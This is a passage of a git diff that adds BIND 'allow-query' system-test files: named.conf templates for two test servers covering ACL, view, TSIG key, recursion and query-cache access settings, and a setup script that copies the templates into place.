COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl accept { 10.53.0.1; }; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { accept; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named09.conf.in b/bin/tests/system/allow-query/ns2/named09.conf.in new file mode 100644 index 0000000..b2d900e --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named09.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl accept { 10.53.0.2; }; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query {! accept; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named10.conf.in b/bin/tests/system/allow-query/ns2/named10.conf.in new file mode 100644 index 0000000..b91d19a --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named10.conf.in @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key one { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { key one; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named11.conf.in b/bin/tests/system/allow-query/ns2/named11.conf.in new file mode 100644 index 0000000..308c4ca --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named11.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key one { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key two { + algorithm hmac-md5; + secret "1234efgh8765"; +}; + + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { key one; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named12.conf.in b/bin/tests/system/allow-query/ns2/named12.conf.in new file mode 100644 index 0000000..6b0fe55 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named12.conf.in @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key one { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query {! key one; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; diff --git a/bin/tests/system/allow-query/ns2/named21.conf.in b/bin/tests/system/allow-query/ns2/named21.conf.in new file mode 100644 index 0000000..311eaf7 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named21.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; +}; diff --git a/bin/tests/system/allow-query/ns2/named22.conf.in b/bin/tests/system/allow-query/ns2/named22.conf.in new file mode 100644 index 0000000..1c191da --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named22.conf.in @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query { any; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; + +}; diff --git a/bin/tests/system/allow-query/ns2/named23.conf.in b/bin/tests/system/allow-query/ns2/named23.conf.in new file mode 100644 index 0000000..e0cd069 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named23.conf.in @@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query { none; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; +}; diff --git a/bin/tests/system/allow-query/ns2/named24.conf.in b/bin/tests/system/allow-query/ns2/named24.conf.in new file mode 100644 index 0000000..33f03b0 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named24.conf.in @@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query { 10.53.0.2; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; +}; diff --git a/bin/tests/system/allow-query/ns2/named25.conf.in b/bin/tests/system/allow-query/ns2/named25.conf.in new file mode 100644 index 0000000..28cadd0 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named25.conf.in @@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query { 10.53.0.1; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; +}; diff --git a/bin/tests/system/allow-query/ns2/named26.conf.in b/bin/tests/system/allow-query/ns2/named26.conf.in new file mode 100644 index 0000000..52b915d --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named26.conf.in @@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query {! 10.53.0.2; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; +}; diff --git a/bin/tests/system/allow-query/ns2/named27.conf.in b/bin/tests/system/allow-query/ns2/named27.conf.in new file mode 100644 index 0000000..c95838c --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named27.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl accept { 10.53.0.2; }; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query { accept; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; + +}; diff --git a/bin/tests/system/allow-query/ns2/named28.conf.in b/bin/tests/system/allow-query/ns2/named28.conf.in new file mode 100644 index 0000000..06d9b91 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named28.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl accept { 10.53.0.1; }; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query { accept; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; +}; diff --git a/bin/tests/system/allow-query/ns2/named29.conf.in b/bin/tests/system/allow-query/ns2/named29.conf.in new file mode 100644 index 0000000..acd1b41 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named29.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl accept { 10.53.0.2; }; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query {! accept; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; +}; diff --git a/bin/tests/system/allow-query/ns2/named30.conf.in b/bin/tests/system/allow-query/ns2/named30.conf.in new file mode 100644 index 0000000..aefc474 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named30.conf.in @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key one { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query { key one; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; +}; diff --git a/bin/tests/system/allow-query/ns2/named31.conf.in b/bin/tests/system/allow-query/ns2/named31.conf.in new file mode 100644 index 0000000..27eccc2 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named31.conf.in @@ -0,0 +1,49 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key one { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key two { + algorithm hmac-md5; + secret "1234efgh8765"; +}; + + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { key one; }; +}; + +include "controls.conf"; + +view "internal" { + + allow-query { key one; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; +}; diff --git a/bin/tests/system/allow-query/ns2/named32.conf.in b/bin/tests/system/allow-query/ns2/named32.conf.in new file mode 100644 index 0000000..adbb203 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named32.conf.in @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key one { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query {! key one; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; +}; diff --git a/bin/tests/system/allow-query/ns2/named33.conf.in b/bin/tests/system/allow-query/ns2/named33.conf.in new file mode 100644 index 0000000..be1e160 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named33.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { none; }; +}; + +include "controls.conf"; + +view "internal" { + + allow-query { any; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; + +}; diff --git a/bin/tests/system/allow-query/ns2/named34.conf.in b/bin/tests/system/allow-query/ns2/named34.conf.in new file mode 100644 index 0000000..d35ac3e --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named34.conf.in @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { any; }; +}; + +include "controls.conf"; + +view "internal" { + + allow-query { none; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; +}; diff --git a/bin/tests/system/allow-query/ns2/named40.conf.in b/bin/tests/system/allow-query/ns2/named40.conf.in new file mode 100644 index 0000000..364f94b --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named40.conf.in @@ -0,0 +1,107 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl accept { 10.53.0.2; }; + +acl badaccept { 10.53.0.1; }; + +key one { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key two { + algorithm hmac-md5; + secret "1234efgh8765"; +}; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; +}; + +zone "any.example" { + type primary; + file "generic.db"; + allow-query { any; }; +}; + +zone "none.example" { + type primary; + file "generic.db"; + allow-query { none; }; +}; + +zone "addrallow.example" { + type primary; + file "generic.db"; + allow-query { 10.53.0.2; }; +}; + +zone "addrnotallow.example" { + type primary; + file "generic.db"; + allow-query { 10.53.0.1; }; +}; + +zone "addrdisallow.example" { + type primary; + file "generic.db"; + allow-query { ! 10.53.0.2; }; +}; + +zone "aclallow.example" { + type primary; + file "generic.db"; + allow-query { accept; }; +}; + +zone "aclnotallow.example" { + type primary; + file "generic.db"; + allow-query { badaccept; }; +}; + +zone "acldisallow.example" { + type primary; + file "generic.db"; + allow-query { ! accept; }; +}; + +/* Also usable for testing key not allowed */ +zone "keyallow.example" { + type primary; + file "generic.db"; + allow-query { key one; }; +}; + +zone "keydisallow.example" { + type primary; + file "generic.db"; + allow-query { ! key one; }; +}; diff --git a/bin/tests/system/allow-query/ns2/named53.conf.in b/bin/tests/system/allow-query/ns2/named53.conf.in new file mode 100644 index 0000000..41ac6d3 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named53.conf.in @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { none; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; + allow-query { any; }; +}; diff --git a/bin/tests/system/allow-query/ns2/named54.conf.in b/bin/tests/system/allow-query/ns2/named54.conf.in new file mode 100644 index 0000000..64a3f69 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named54.conf.in @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + allow-query { any; }; +}; + +include "controls.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "generic.db"; + allow-query { none; }; +}; diff --git a/bin/tests/system/allow-query/ns2/named55.conf.in b/bin/tests/system/allow-query/ns2/named55.conf.in new file mode 100644 index 0000000..642e4c9 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named55.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query { none; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + allow-query { any; }; + }; + +}; diff --git a/bin/tests/system/allow-query/ns2/named56.conf.in b/bin/tests/system/allow-query/ns2/named56.conf.in new file mode 100644 index 0000000..187d697 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named56.conf.in @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + + allow-query { any; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + allow-query { none; }; + }; +}; diff --git a/bin/tests/system/allow-query/ns2/named57.conf.in b/bin/tests/system/allow-query/ns2/named57.conf.in new file mode 100644 index 0000000..1502b12 --- /dev/null +++ b/bin/tests/system/allow-query/ns2/named57.conf.in @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +include "controls.conf"; + +view "internal" { + allow-query-on { any; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "normal.example" { + type primary; + file "generic.db"; + }; + + zone "aclnotallow.example" { + type primary; + file "generic.db"; + allow-query-on { none; }; + }; +}; diff --git a/bin/tests/system/allow-query/ns3/named.args b/bin/tests/system/allow-query/ns3/named.args new file mode 100644 index 0000000..35e99d8 --- /dev/null +++ b/bin/tests/system/allow-query/ns3/named.args @@ -0,0 +1,2 @@ +# this server only has 127.0.0.1 in its localhost/localnets ACLs +-m record,size,mctx -c named.conf -d 99 -D allow-query-ns3 -X named.lock -g -T maxcachesize=2097152 -T fixedlocal diff --git a/bin/tests/system/allow-query/ns3/named1.conf.in b/bin/tests/system/allow-query/ns3/named1.conf.in new file mode 100644 index 0000000..68af61f --- /dev/null +++ b/bin/tests/system/allow-query/ns3/named1.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/allow-query/ns3/named2.conf.in b/bin/tests/system/allow-query/ns3/named2.conf.in new file mode 100644 index 0000000..d3f2205 --- /dev/null +++ b/bin/tests/system/allow-query/ns3/named2.conf.in @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + allow-recursion { any; }; + allow-recursion-on { none; }; + allow-query-cache-on { 10.53.0.3; }; + dnssec-validation no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/allow-query/ns3/named3.conf.in b/bin/tests/system/allow-query/ns3/named3.conf.in new file mode 100644 index 0000000..32e1e0d --- /dev/null +++ b/bin/tests/system/allow-query/ns3/named3.conf.in @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; 10.53.1.2; }; + listen-on-v6 { none; }; + recursion yes; + allow-recursion { any; }; + allow-query-cache { any; }; + allow-query-cache-on { 10.53.0.3; }; # allow-recursion-on inherits + dnssec-validation no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/allow-query/ns3/named4.conf.in b/bin/tests/system/allow-query/ns3/named4.conf.in new file mode 100644 index 0000000..e8ab737 --- /dev/null +++ b/bin/tests/system/allow-query/ns3/named4.conf.in @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; 10.53.1.2; }; + listen-on-v6 { none; }; + recursion yes; + allow-recursion { any; }; + allow-query-cache { any; }; + allow-recursion-on { 10.53.0.3; }; # allow-query-cache-on inherits + dnssec-validation no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/allow-query/setup.sh b/bin/tests/system/allow-query/setup.sh new file mode 100644 index 0000000..3a693b5 --- /dev/null +++ b/bin/tests/system/allow-query/setup.sh @@ -0,0 +1,20 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ../common/controls.conf.in ns2/controls.conf +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named01.conf.in ns2/named.conf +copy_setports ns3/named1.conf.in 